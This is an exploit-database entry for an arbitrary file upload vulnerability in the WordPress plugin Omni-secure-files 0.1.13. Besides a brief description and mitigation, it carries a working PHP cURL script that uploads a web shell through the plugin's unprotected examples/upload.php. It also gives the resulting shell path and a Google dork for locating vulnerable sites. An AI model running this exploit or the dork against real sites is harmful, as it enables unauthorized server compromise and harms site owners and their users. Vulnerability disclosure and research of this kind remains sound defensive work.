header-logo
Suggest Exploit
vendor:
Omni-Secure-Files
by:
Adrien Thierry
7,5
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: Omni-Secure-Files
Affected Version From: 0.1.13
Affected Version To: 0.1.13
Patch Exists: NO
Related CWE: N/A
CPE: a:omni-secure:omni-secure-files
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

WordPress Omni-secure-files 0.1.13 Arbitrary File Upload

WordPress Omni-secure-files 0.1.13 is vulnerable to Remote File Upload. An attacker can upload a malicious file to the server by exploiting the vulnerable upload.php page in the 'examples' folder. The malicious file can be accessed at http://server/wp-content/plugins/wp-content/plugins/omni-secure-files/plupload/examples/uploads/shell.php

Mitigation:

Ensure that the upload.php page is not accessible to unauthorized users and that all uploaded files are scanned for malicious content.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Omni-secure-files 0.1.13 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/omni-secure-files/
# Date: 07/06/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage: http://omni-secure.com/
# Software Link: http://downloads.wordpress.org/plugin/omni-secure-files.zip
# Version: 0.1.13

Maybe some trash files, but page upload.php in folder "examples" is vulnerable to Remote File Upload. Code :

<?php
$u="whatelse.php";
$c = curl_init("http://server/wp-content/plugins/omni-secure-files/plupload/examples/upload.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('file'=>"@$u",'name'=>"shell.php"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e; 
?>


Shell could be found at :
	http://server/wp-content/plugins/wp-content/plugins/omni-secure-files/plupload/examples/uploads/shell.php
	
#########################################################################################